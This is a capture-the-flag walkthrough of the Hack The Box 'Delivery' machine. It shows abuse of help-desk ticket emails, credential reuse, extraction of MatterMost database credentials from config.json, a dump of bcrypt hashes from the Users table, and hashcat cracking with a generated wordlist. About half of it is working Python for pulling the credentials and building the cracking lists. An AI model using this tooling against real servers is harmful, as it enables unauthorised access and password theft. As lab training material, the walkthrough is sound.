Introduction

Delivery is an Easy ‘Real World’ style box from HTB, created by IPPSEC. It showcases problems in help-desk systems and password reuse. I begin every scan using RustScan; once it completes, it hands the open ports to Nmap for script and version scanning and exports the results to HTML for easy reading.


After finishing the scans I noticed port 80 was open. Visiting the website, I see a homepage for Delivery and a Contact Us button.

Contact Us page showing a lot of useful information (hints).


I can see a few key pieces of information on the Contact page: a link to the HelpDesk, the fact that having an @delivery.htb address provides further access, and a link to the MatterMost server. I click each link and add the hostnames to my hosts file.


I visit MatterMost first and try, unsuccessfully, to register. Next, I navigate over to the Support Desk and open a new ticket. My first thought was to try uploading a PHP web shell or some cross-site scripting. There was also a CSRF (Cross-Site Request Forgery) token in place, which stunted a lot of progress. During this time I also had a few FeroxBuster scans running in the background, searching for directories on the primary website and the MatterMost server. I feel it is important to highlight these items and this mindset, as they are not regularly mentioned.

After coming up short with everything mentioned above, I finished filling out the ticket. I should have realized this was an IPPSEC box and not one of the normal ‘Easy’ boxes I had become accustomed to on HTB. After submitting the ticket I was presented with an automated message which tied the ticket ID to an @delivery.htb address. Any mail sent to that address is appended to the ticket thread, which is what makes the next step work.

I went back to MatterMost, filled out the registration form with that ticket address as the email, and viewed the ticket, where the confirmation arrived:

Confirmation of my MatterMost registration.


I logged into MatterMost and read through the thread. First I noticed some credentials for the maildeliverer account. I also noted the password-reuse comment with the typical IPPSEC PleaseSubscribe!. As someone who has watched every video IPPSEC has on his channel, this was a huge hint.

Viewing the thread shows a few more key pieces of information AND the user flag.


User Escalation


After logging in with the maildeliverer account I immediately went searching for the MatterMost configuration. This is because most web applications have a configuration file or database, because the root account was a user on the board, AND because I had read the MatterMost documentation during my discovery.

MatterMost configuration provides database credentials.


The configuration file provided the database credentials. I logged in to the database and queried the Users table. Inside I found a password hash:

Password hash for the root account.
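MatterMost reads its settings from config.json in its install directory (typically /opt/mattermost/config/config.json on a tarball install), and the database connection string sits under SqlSettings.DataSource as a Go MySQL DSN. The following is an added example, not code from the writeup: it parses a constructed sample of that file, pulls the user, password, host and database name out of the DSN, and builds the mysql command to dump the Users table, where MatterMost stores bcrypt hashes. The credentials in the sample are placeholders, not the ones from the box.

```python
"""Pull the MySQL credentials out of a Mattermost config.json.

Mattermost keeps its connection string under SqlSettings.DataSource as a
Go MySQL DSN:  user:password@tcp(host:port)/dbname?param=value&...
"""
import json
import re
import shlex

# Constructed sample (not the file from the box): a trimmed config.json with
# placeholder credentials. The "\u0026" is how Go's JSON encoder writes '&',
# so this is what the real file looks like when you cat it; json.loads decodes it.
SAMPLE_CONFIG = r'''{
  "SqlSettings": {
    "DriverName": "mysql",
    "DataSource": "mmuser:Example_Passw0rd@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
    "DataSourceReplicas": []
  }
}'''

# Go MySQL DSN grammar (go-sql-driver/mysql). The password group is greedy so a
# password containing '@' still parses: the split happens at the last '@' that
# is followed by 'proto('.
DSN_RE = re.compile(
    r"^(?P<user>[^:@]*)(?::(?P<password>.*))?@"  # user[:password]@
    r"(?P<proto>[a-z]+)\((?P<addr>[^)]*)\)"      # tcp(host:port) | unix(/path/to.sock)
    r"/(?P<db>[^?]*)"                            # /dbname
    r"(?:\?(?P<params>.*))?$"                    # ?k=v&k2=v2
)


def parse_mysql_dsn(dsn):
    """Return a dict with user, password, proto, addr, host, port, db, params."""
    m = DSN_RE.match(dsn)
    if not m:
        raise ValueError("unrecognised Go MySQL DSN: %r" % dsn)
    d = m.groupdict()
    d["password"] = d["password"] or ""
    d["params"] = (dict(kv.split("=", 1) for kv in d["params"].split("&"))
                   if d["params"] else {})
    d["host"] = d["port"] = None
    if d["proto"] == "tcp":
        addr = d["addr"] or "127.0.0.1:3306"  # driver default when the address is empty
        host, _, port = addr.rpartition(":") if ":" in addr else (addr, "", "")
        d["host"], d["port"] = host, int(port) if port else 3306
    return d


def db_creds_from_config(config_text):
    """Parse config.json text and return the primary database credentials."""
    cfg = json.loads(config_text)
    sql = cfg["SqlSettings"]
    creds = parse_mysql_dsn(sql["DataSource"])
    creds["driver"] = sql.get("DriverName", "mysql")
    return creds


# Mattermost's Users table holds bcrypt hashes ($2a$10$...) in the Password column.
USERS_QUERY = "SELECT Username, Password FROM Users;"


def mysql_command(creds, query=USERS_QUERY):
    """Build the mysql CLI call that runs `query`.

    The password goes into the MYSQL_PWD environment variable instead of a
    -p<password> argument, so it does not show up in `ps` output for other
    users on the box.
    """
    argv = ["mysql", "-u", creds["user"], "-D", creds["db"], "-e", query]
    if creds["proto"] == "tcp":
        argv += ["-h", creds["host"], "-P", str(creds["port"])]
    elif creds["proto"] == "unix":
        argv += ["-S", creds["addr"]]
    shell = "MYSQL_PWD=%s %s" % (shlex.quote(creds["password"]), shlex.join(argv))
    return {"argv": argv, "env": {"MYSQL_PWD": creds["password"]}, "shell": shell}


if __name__ == "__main__":
    creds = db_creds_from_config(SAMPLE_CONFIG)
    print("user=%(user)s password=%(password)s host=%(host)s db=%(db)s" % creds)
    print(mysql_command(creds)["shell"])
```

The same parser handles a unix-socket DSN (unix(/path/to/mysqld.sock)) and a DSN without a password, which is why the regex is a little more involved than a split on ':' and '@'.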


I used THIS link alongside a program called Mentalist to build a password list for Hashcat. I used the baseline password of PleaseSubscribe! as noted in the support post and added the years 2019-2021 as variants, alongside the seasons. I was going to go wider and use a ruleset; however, thankfully I got a hit.

Mentalist password list being built.


Hashcat running the password list.
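The Mentalist list described above, rebuilt in Python as an added example (it is not the author's list or Mentalist's output): the base word PleaseSubscribe!, the years 2019-2021 and the seasons are from the post; the separator-free concatenation, the case variants, and the export of the same manglings as a hashcat rule file (the "wider" approach the post mentions) are this example's own assumptions.

```python
"""Build a targeted wordlist (plus the equivalent hashcat rules) from a single
base password, the way Mentalist does it by chaining mangling nodes.

The base word, years and seasons come from the writeup; the concatenation
patterns, case forms and the rule export are this example's own choices.
"""
import itertools

BASE = "PleaseSubscribe!"                       # hinted in the MatterMost thread
YEARS = [str(y) for y in range(2019, 2022)]     # 2019, 2020, 2021
SEASONS = ["Spring", "Summer", "Fall", "Autumn", "Winter"]


def year_forms(year):
    """'2021' -> ['2021', '21']; Mentalist's year node offers both spellings."""
    return [year, year[2:]]


def case_forms(word):
    """Season as written, lowercase and uppercase."""
    return [word, word.lower(), word.upper()]


def mangles(years=YEARS, seasons=SEASONS):
    """All strings that get glued onto the base: years, seasons, season+year."""
    out = []
    for y in years:
        out.extend(year_forms(y))
    for s in seasons:
        out.extend(case_forms(s))
    for s, y in itertools.product(seasons, years):
        for sc, yf in itertools.product(case_forms(s), year_forms(y)):
            out.append(sc + yf)
    return out


def build_candidates(base=BASE, years=YEARS, seasons=SEASONS):
    """Ordered, de-duplicated candidate list.

    Order matters: bcrypt is deliberately slow, so the cheap guesses (the bare
    base word, then base+year) go first.
    """
    m = mangles(years, seasons)
    cands = [base] + [base + x for x in m] + [x + base for x in m]
    seen, out = set(), []
    for c in cands:
        if c not in seen:
            seen.add(c)
            out.append(c)
    return out


def suffix_rule(s):
    """hashcat rule appending s: one '$c' per character, in order."""
    return "".join("$" + ch for ch in s)


def prefix_rule(s):
    """hashcat rule prepending s: one '^c' per character, reversed, because
    each '^' pushes onto the front of the word."""
    return "".join("^" + ch for ch in reversed(s))


def build_rules(years=YEARS, seasons=SEASONS):
    """The same manglings as a hashcat rule file; ':' keeps the word unchanged."""
    m = mangles(years, seasons)
    return [":"] + [suffix_rule(x) for x in m] + [prefix_rule(x) for x in m]


def write_lines(path, lines):
    with open(path, "w") as fh:
        fh.write("\n".join(lines) + "\n")
    return len(lines)


if __name__ == "__main__":
    write_lines("wordlist.txt", build_candidates())   # hashcat -m 3200 hash.txt wordlist.txt
    write_lines("base.txt", [BASE])
    write_lines("mangles.rule", build_rules())        # hashcat -m 3200 hash.txt base.txt -r mangles.rule
```

Mattermost's hashes are bcrypt, so hashcat mode 3200 applies either way; the rule-file route is what scales when you want to try the same manglings against more than one base word without regenerating the list.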


I used the cracked password to log in as root and claimed the flag. Thanks IPPSEC for the awesome box.

The root flag for the Delivery box hosted by HTB and created by IPPSEC.


Rooted

Published On: May 22nd, 2021 / Categories: HTB, Technology
